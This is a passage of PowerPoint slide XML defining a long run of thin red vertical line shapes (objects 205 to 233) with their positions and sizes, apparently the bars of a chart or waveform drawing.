            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="351155">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="350896"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="object 206"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084411" y="5414157"/>
            <a:ext cx="0" cy="573807"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="289560">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="289044"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="object 207"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084411" y="5411183"/>
            <a:ext cx="0" cy="578840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="292100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="292047"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="object 208"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4104245" y="5114276"/>
            <a:ext cx="0" cy="873294"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="440689">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="440373"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="object 209"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4104245" y="5111302"/>
            <a:ext cx="0" cy="879586"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="443864">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="443376"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="object 210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4124476" y="5525225"/>
            <a:ext cx="0" cy="461814"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="233044">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="232996"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="object 211"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4124476" y="5522248"/>
            <a:ext cx="0" cy="468106"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="236219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="235999"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="object 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4144308" y="5264215"/>
            <a:ext cx="0" cy="723550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="365125">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="364710"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="object 213"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4144308" y="5261239"/>
            <a:ext cx="0" cy="729842"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="368300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="367713"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="object 214"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4164142" y="5552993"/>
            <a:ext cx="0" cy="434130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="219075">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="218985"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="object 215"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4164142" y="5550015"/>
            <a:ext cx="0" cy="440422"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="222250">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="221987"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="object 216"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4183975" y="5291981"/>
            <a:ext cx="0" cy="695867"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="351155">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="350698"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="object 217"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4183975" y="5289007"/>
            <a:ext cx="0" cy="700900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="353694">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="353701"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="object 218"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4203809" y="5530775"/>
            <a:ext cx="0" cy="456779"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="230505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="230195"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="object 219"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4203809" y="5527802"/>
            <a:ext cx="0" cy="463070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="233680">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="233197"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="object 220"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4223642" y="5297539"/>
            <a:ext cx="0" cy="689575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="347980">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="347893"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="object 221"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4223642" y="5294565"/>
            <a:ext cx="0" cy="695867"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="351155">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="350896"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="object 222"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4243476" y="5586310"/>
            <a:ext cx="0" cy="401413"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="202564">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="202171"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="object 223"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4243476" y="5583334"/>
            <a:ext cx="0" cy="407705"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="205739">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="205174"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="object 224"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4263308" y="5314195"/>
            <a:ext cx="0" cy="673217"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="339725">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="339488"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="object 225"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4263308" y="5311220"/>
            <a:ext cx="0" cy="679508"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="342900">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="342491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="object 226"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4283143" y="5503011"/>
            <a:ext cx="0" cy="484464"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="244475">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="244207"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="object 227"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4283143" y="5500034"/>
            <a:ext cx="0" cy="490756"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="247650">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="247209"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="object 228"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4302975" y="5419711"/>
            <a:ext cx="0" cy="567515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="286385">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="286242"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="object 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4302975" y="5416735"/>
            <a:ext cx="0" cy="573807"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="289560">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="289245"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="object 230"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4322809" y="5652946"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="object 231"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4322809" y="5649973"/>
            <a:ext cx="0" cy="341012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="172085">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="171546"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="object 232"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343040" y="5319748"/>
            <a:ext cx="0" cy="668183"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="337185">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="336686"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="object 233"/>
